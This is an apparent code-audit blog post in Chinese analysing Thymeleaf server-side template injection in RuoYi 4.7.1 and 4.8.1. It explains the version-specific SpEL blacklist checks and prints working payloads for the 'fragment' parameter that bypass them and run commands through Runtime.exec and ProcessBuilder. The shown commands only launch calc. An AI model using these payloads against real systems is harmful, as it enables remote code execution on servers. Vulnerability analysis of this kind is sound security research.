【代码审计】RuoYi-4.7.1&4.8.1 Thymeleaf模板注入分析

目录

[V 4.7.1](#V 4.7.1)

[V 4.8.1](#V 4.8.1)


V 4.7.1

用的是3.0.12的Thymeleaf依赖

该版本对新建类有一些限制

https://github.com/thymeleaf/thymeleaf/issues/809

这三个路由都可以从fragment处打入thymeleaf ssti

打入payload:

复制代码
fragment=${T (java.lang.Runtime).getRuntime().exec("calc")}

来分析下为什么要这么构造payload:

3.0.12的Thymeleaf要求不能containsSpELInstantiationOrStatic

作用是 检测一个 SpEL表达式中是否包含对象实例化(如 new SomeClass(...))或静态方法调用(如 T(SomeClass).method())。

首先是把独立的new给ban了,也不允许出现T(xxx)

可以加个空格,用T (xxx)来进行绕过

V 4.8.1

用的是3.0.15的Thymeleaf依赖

来看下区别

用于检测字符串中是否存在以 $、*、#、@ 或 ~ 开头、后跟空白字符或者{,如果以该格式,则不允许

可以这么绕过

复制代码
|$${new.java.lang.ProcessBuilder('calc').start()}|

等效于

复制代码
'$' + ${new.java.lang.ProcessBuilder('calc').start()}

打入payload:

复制代码
fragment=|$${new.java.lang.ProcessBuilder('calc').start()}|

或者

复制代码
fragment=|$${''.getClass().forName('org.'+'springframework.expression.spel.standard.SpelExpressionParser').newInstance().parseExpression("''.getClass().forName('java.lang.Runtime').getRuntime().exec('calc')").getValue()}|
相关推荐
独自破碎E6 分钟前
总持续时间可被 60 整除的歌曲
java·开发语言
Python+JAVA+大数据10 分钟前
TCP_IP协议栈深度解析
java·网络·python·网络协议·tcp/ip·计算机网络·三次握手
丶小鱼丶10 分钟前
Java基础之【多线程】
java
东东51641 分钟前
基于vue的电商购物网站vue +ssm
java·前端·javascript·vue.js·毕业设计·毕设
她说..1 小时前
策略模式+工厂模式实现审批流(面试问答版)
java·后端·spring·面试·springboot·策略模式·javaee
鹿角片ljp1 小时前
力扣9.回文数-转字符双指针和反转数字
java·数据结构·算法
skywalker_111 小时前
网络编程篇
java·网络协议·网络编程
毕设源码-朱学姐1 小时前
【开题答辩全过程】以 基于Java的九价疫苗预约系统为例,包含答辩的问题和答案
java·开发语言
tb_first1 小时前
SSM速通4
java·jvm·spring·tomcat·maven·mybatis
百炼成神 LV@菜哥1 小时前
Kylin Linux V10 aarch64安装DBeaver
java·linux·服务器·kylin